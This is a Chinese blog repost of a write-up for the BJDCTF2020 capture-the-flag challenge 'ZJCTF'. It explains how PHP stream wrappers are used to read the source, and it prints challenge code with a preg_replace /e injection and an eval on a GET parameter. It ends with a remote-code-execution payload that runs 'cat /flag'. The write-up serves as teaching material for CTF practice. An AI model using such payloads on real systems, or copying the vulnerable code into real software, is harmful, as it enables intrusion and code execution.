我是靠谱客的博主 负责钢笔,最近开发中收集的这篇文章主要介绍[BJDCTF2020]ZJCTF,不过如此 简单思路及做法,觉得挺不错的,现在分享给大家,希望可以做个参考。

概述

前言

文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途!

题目

在这里插入图片描述
稍微审计,发现需要读到文件内容为I have a dream,自然而然的就可以想到用伪协议来做题!
注释里提醒了next.php,我们同样用伪协议base64加密来读文件
data://text/plain,
在这里插入图片描述
php://input
在这里插入图片描述

读到的内容解码出来

<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\1")',
        $str
    );
}


foreach($_GET as $re => $str) {
    echo complex($re, $str). "n";
}

function getFlag(){
	@eval($_GET['cmd']);
}

preg_replace的/e参数,可以造成远程代码执行漏洞具体可以参考这篇文章:
https://xz.aliyun.com/t/2557
payload:

/next.php?S*=${getFlag()}&cmd=system(‘cat /flag’);

在这里插入图片描述

最后

以上就是负责钢笔为你收集整理的[BJDCTF2020]ZJCTF,不过如此 简单思路及做法的全部内容,希望文章能够帮你解决[BJDCTF2020]ZJCTF,不过如此 简单思路及做法所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(79)

评论列表共有 0 条评论

立即
投稿
返回
顶部